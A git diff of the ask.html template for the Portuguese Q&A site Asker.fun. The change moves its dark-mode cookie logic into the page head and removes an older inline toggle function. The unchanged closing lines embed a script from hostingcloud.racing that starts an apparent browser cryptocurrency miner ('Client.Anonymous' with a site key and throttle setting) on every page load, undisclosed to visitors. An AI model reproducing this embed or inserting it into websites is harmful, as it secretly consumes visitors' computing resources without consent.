--- a/main_app/templates/ask.html
+++ b/main_app/templates/ask.html
@@ -8,6 +8,18 @@
 <meta name="keywords" content="asker, asker.fun, perguntar">
 <meta name="description" content="Faça uma pergunta no Asker.fun">
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css">
+<script src="/static/js/cookieman.js?v=0.1"></script>
+<script>
+	if (getDarkCookie() == 'true') {
+		var cssversion = '?v=0.9';
+		var cssfn = 'ask-d.css';
+		var link = document.createElement('link');
+		link.rel = 'stylesheet';
+		link.type = 'text/css';
+		link.href = '/static/css/' + cssfn + cssversion;
+		document.head.appendChild(link);
+	}
+</script>
 <style>
 .form-control {
     border: 1px solid rgba(0,0,0,.125);
@@ -51,22 +63,6 @@ main {
 <div class="alert alert-info"><p>Confirme seu email abrindo o link enviado para ele.<br>Este é o email usado na tela de cadastro: {{ user.email }}</p><p>Caso não encontre o email, verifique na pasta de spam.</p></div>
 {% endif %}
 	</main>
-		<script src="/static/js/cookieman.js?v=0.1"></script>
-	<script>
-function toggleDarkMode() {
-	document.body.style = "background: #222; color: white;";
-
-	texts = document.getElementsByClassName('form-control')
-	for (i = 0; i < texts.length; i++) {
-	    texts[i].classList.add("bg-dark");
-	    texts[i].classList.add("text-light");
-	}
-}
-if (getDarkCookie() == 'true') {
-	toggleDarkMode();
-}
-
-	</script>
 <script src="/static/js/general_functions.js?version=2"></script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 </body>
